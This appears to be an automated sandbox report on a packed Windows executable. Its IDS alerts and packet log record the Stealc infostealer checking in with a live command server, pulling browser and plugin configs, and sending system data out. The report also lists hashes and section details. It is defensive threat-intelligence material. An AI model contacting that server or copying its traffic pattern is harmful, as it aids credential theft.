SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.946891615175662
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'901'568 bytes
MD5:	b061af520eebe18f1c54e1d95c2db957
SHA1:	2c190ae0e8a2030ba33b2891a24fc37008921167
SHA256:	88e31cac8e771a560163e9e270d04e1b803c7c78cda1845dbc0ea7af5366d707
SHA512:	8c1395920bbdfd78dbd4b1f98715641de11732ba2249f30bdf6d65a5cd1ab1ed62c290a7adaa7ec5fc64332ef0977667e668db72f9c9afc75ffddf44c223463d
SSDEEP:	49152:NufRcPnAHVFaFvh7UuLe33ImfvJL6KDGHF8YLLYWno:wGPnA1sFZTe3tvLDGlNk
TLSH:	5895332899D071CACEB926B7C1EF855EE4F5064E0899658A0C7D25EF3D8BC5E00DD1CB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xabc000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FD4C8C1079Ah
psrad mm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FD4C8C12795h
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	9b4771cd5ba10d4f1f9465e200a30643	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x2b2000	0x200	c8aa0edf42a219cc6fa854e24c875317	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qkgtngkb	0x510000	0x1ab000	0x1aa200	496e762727adb4b7568e21ab2a3bad0e	False	0.9950636183631564	data	7.953848132355263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rhnfitks	0x6bb000	0x1000	0x400	5a067eac1db97a115a55dfeb832fc936	False	0.6767578125	data	5.426326380300593	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x6bc000	0x3000	0x2200	ddbb107e3ba98fa297809cafe73cd0cc	False	0.06491268382352941	DOS executable (COM)	0.7635575846921852	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T22:40:03.985872+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:04.215646+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:04.224238+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-09-26T22:40:04.447592+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:04.455258+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-09-26T22:40:05.589528+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:06.108604+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:13.612683+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:15.158100+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:16.308824+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:17.238984+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:20.152920+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T22:40:20.769474+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 22:40:02.908729076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:03.013488054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:03.013690948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:03.013909101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:03.018706083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:03.735167980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:03.735229015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:03.738329887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:03.743136883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:03.985785961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:03.985872030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:03.987361908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:03.992289066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.215579033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.215595961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.215646029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:04.215693951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:04.217356920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:04.224237919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.447477102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.447496891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.447508097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.447592020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:04.447602987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.447657108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:04.448009014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.448019981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.448031902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.448060989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:04.448086977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:04.450247049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:04.455257893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.687463999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.687536001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:04.708097935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:04.708132029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:04.712903023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.712923050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.712934017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.712975025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.713084936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.713146925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:04.713306904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:05.589402914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:05.589528084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:05.882802010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:05.887820959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.108514071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.108532906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.108541965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.108603954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.108658075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.108748913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.108762026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.108773947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.108805895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.108805895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.108839989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.109330893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.109386921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.109396935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.109399080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.109427929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.109458923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.110194921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.110207081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.110218048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.110261917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.110291004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.110938072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.111030102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.237942934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.237974882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.237987041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.237998962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.238044024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.238087893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.238105059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.238126993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.238142014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.238153934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.238154888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.238172054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.238192081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.238224030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.238975048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.238995075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.239006042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.239022017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.239057064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.239435911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.239447117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.239464045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.239483118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.239506960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.239753008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.239763975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.239803076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.240216970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.240264893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.240277052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.240288973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.240319967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.240339041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.240350962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.240362883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.240407944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.240422964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.241219044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.241266012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.241302013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.241360903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.328531027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.328563929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.328644037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.368113041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368140936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368161917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368172884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368181944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368191957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368205070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368216038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368246078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.368309021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.368598938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368609905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368618965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368655920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.368707895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.368711948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368722916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368732929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368746042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368758917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.368761063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.368791103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.368820906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.369537115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.369575977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.369587898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.369591951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.369622946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.369652987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.369666100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.369677067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.369684935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.369695902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.369709969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.369715929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.369765043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.370572090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.370584011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.370594025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.370620966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.370620966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.370640993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.370655060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.370667934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.370672941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.370672941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.370686054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.370718956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.370748997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.371550083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.371560097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.371571064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.371603012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.371623039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.371623039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.371633053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.371644974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.371649981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.371669054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.371676922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.371686935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.371722937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.371751070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.372503996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.372514009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.372524023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.372534037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.372544050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.372564077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.372598886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.496526957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.496539116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.496651888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.496743917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.496799946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.496809959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.496820927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.496819973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.496848106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.496900082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.496936083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.496946096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.496954918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.497009993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.497045994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.497061968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.497071981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.497081995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.497092962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.497102022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.497107029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.497113943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.497152090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.497179985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.497500896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.497535944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.497550964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.497560978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:06.497591972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:06.497596025 CEST	49730	80	192.168.2.4	185.215.113.37
